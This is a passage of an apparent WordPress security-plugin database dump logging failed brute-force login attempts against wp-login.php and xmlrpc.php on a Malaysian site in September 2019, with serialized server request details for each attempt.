Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.72.200\";s:11:\"REMOTE_PORT\";s:5:\"50842\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBWI9VIJ66zPtjtaf32lwAAAVU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568691747.8738\";s:12:\"REQUEST_TIME\";s:10:\"1568691747\";}}','notice','2019-09-17 03:42:29','2019-09-17 03:42:28',18256000,19555136,'https://bintara.com.my/xmlrpc.php',1,0,'144.217.72.200'),(24374,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"33750\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBXfNK-omY048@iBsMqKgAAANA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568692092.9637\";s:12:\"REQUEST_TIME\";s:10:\"1568692092\";}}','notice','2019-09-17 03:48:14','2019-09-17 03:48:13',17740416,19231192,'https://bintara.com.my/wp-login.php',1,0,'166.62.123.55'),(24375,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"34180\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBXfx@uZ4OC5N1Fn8E8pAAAAJc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568692095.8103\";s:12:\"REQUEST_TIME\";s:10:\"1568692095\";}}','notice','2019-09-17 03:48:17','2019-09-17 03:48:16',18256408,19555696,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.123.55'),(24376,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.227.20.208\";s:11:\"REMOTE_PORT\";s:5:\"33759\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBZyA99C9j9bhK9KplFoQAAARQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568692680.8034\";s:12:\"REQUEST_TIME\";s:10:\"1568692680\";}}','notice','2019-09-17 03:58:02','2019-09-17 03:58:01',17744880,19230176,'https://bintara.com.my/wp-login.php',1,0,'212.227.20.208'),(24377,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.227.20.208\";s:11:\"REMOTE_PORT\";s:5:\"33759\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBZyA99C9j9bhK9KplFoQAAARQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568692680.8034\";s:12:\"REQUEST_TIME\";s:10:\"1568692680\";}}','notice','2019-09-17 03:58:02','2019-09-17 03:58:01',17906056,19230176,'https://bintara.com.my/wp-login.php',1,0,'212.227.20.208'),(24378,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.227.20.208\";s:11:\"REMOTE_PORT\";s:5:\"34319\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBZzB@uZ4OC5N1Fn8E9VgAAAJE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568692684.3981\";s:12:\"REQUEST_TIME\";s:10:\"1568692684\";}}','notice','2019-09-17 03:58:05','2019-09-17 03:58:04',18255752,19554520,'https://bintara.com.my/xmlrpc.php',1,0,'212.227.20.208'),(24379,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"217.11.48.148\";s:11:\"REMOTE_PORT\";s:5:\"57988\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBagB@uZ4OC5N1Fn8E9igAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568692864.3522\";s:12:\"REQUEST_TIME\";s:10:\"1568692864\";}}','notice','2019-09-17 04:01:06','2019-09-17 04:01:04',17739616,19229768,'https://bintara.com.my/wp-login.php',1,0,'217.11.48.148'),(24380,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"217.11.48.148\";s:11:\"REMOTE_PORT\";s:5:\"58620\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBag9K-omY048@iBsMq1QAAANc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568692867.4639\";s:12:\"REQUEST_TIME\";s:10:\"1568692867\";}}','notice','2019-09-17 04:01:09','2019-09-17 04:01:07',18256064,19554656,'https://bintara.com.my/xmlrpc.php',1,0,'217.11.48.148'),(24381,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.126.104\";s:11:\"REMOTE_PORT\";s:5:\"37942\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBb2dVIJ66zPtjtaf37OQAAAU0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568693209.4232\";s:12:\"REQUEST_TIME\";s:10:\"1568693209\";}}','notice','2019-09-17 04:06:50','2019-09-17 04:06:49',17742048,19233336,'https://bintara.com.my/wp-login.php',1,0,'162.144.126.104'),(24382,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 